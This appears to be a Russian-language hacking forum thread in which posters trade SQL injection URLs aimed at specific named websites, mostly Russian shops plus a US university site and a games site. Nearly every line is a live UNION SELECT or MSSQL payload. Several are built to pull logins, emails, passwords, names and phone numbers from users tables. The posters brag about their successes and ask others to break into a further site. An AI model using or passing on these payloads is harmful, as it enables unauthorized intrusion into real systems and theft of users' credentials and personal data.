Code: __http://www.vyshop.com/product_detail.php?id=-5+union+select+1,concat(user(),char(58),database(),char(58),version()),333,444,555,6,7,8,9,10,11/* Code: __http://www.gamesfirst.com/index.php?id=1132'
http://www.gamesfirst.com/index.php?id=-1132+UNION+SELECT+1,count(*),3+from+users/* http://www.gamesfirst.com/index.php?id=-1132+UNION+SELECT+null,concat(userid,char(58),username,char(58),password),null+from+users/* Когда же по нормальному все научитесь делать чуть какое то отклонение от правил сразу... такие глаза oO )))
_http://www.rsi.ru/news/news.asp?id=2334+or+1=(SELECT+TOP+1+cast(LOGINS+as+nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar)%2B%27%3A%27%2Bcast(MAIL+as+nvarchar)+from+RSI_LOGINS+where+Id=1)-- вот и mssql забацал _http://www.eng.wayne.edu/news.php?id=-99+union+select+1,id,3,4,5,6,7,8,9,0,1,2,3+from+users/* а вот с названием отстальных колонок проблемы
Code: http://www.duet-service.ru/conf/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* http://www.ww-realty.ru/main.php?pg=faq&faqaction=showsubheading&id=-1+union+select+1,2,database(),4,5,6/*
Code: http://www.kelektro.ru/katalog.phtml?N_KATALOG_TEXT=-1+union+select+1,user(),3,4,5,6,7,8/* http://www.mikroakustika.ru/cnt1.php?l1=-1+union+select+1,user(),3,4,5,6/*
Code: http://www.5557.ru/price_all.php?el=-1+union+select+1,user(),3,4,5/* http://www.ural-market.com/auto_desc.php?Type=1&CodeTech=-1+union+select+user(),2,3,database(),5,6,7,8,9,10,11,12/* http://www.mcmtravel.ru/excursions/mntur.php?type=-1+union+select+1,user(),3,4,5,6,7,8,9,10/*
_http://www.entrepreneurship.appstate.edu/news.php?id=-99+union+select+1,user(),3,database(),5,6/* ничего не смог вывести
Code: http://allo-mebel.ru/shop/?dir=33-1 http://allo-mebel.ru/shop/?dir=32 иньекции нету. А вот эта понравилась... Code: http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+3,2,1/* http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+null,999999999999,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71)/* хек-хек Code: http://boardsearch.ru/index.php?sect_id=1&rubric_id=-1+UNION+SELECT+null,999999999999,concat(user_id,char(58),email,char(58),password,char(58),name,char(58),phone)+from+users/*
И на старуху бывает проруха. Вот на мой взгляд скули тут нету но сломать надо. Кто расковыряет постипм сюда, но скули там нету имхо.
Code: http://www.sobolmarket.ru/index.php?page=-1+union+select+user()/* http://www.stmaster.ru/price.php?razd=-1+union+select+1,user()/* http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15/*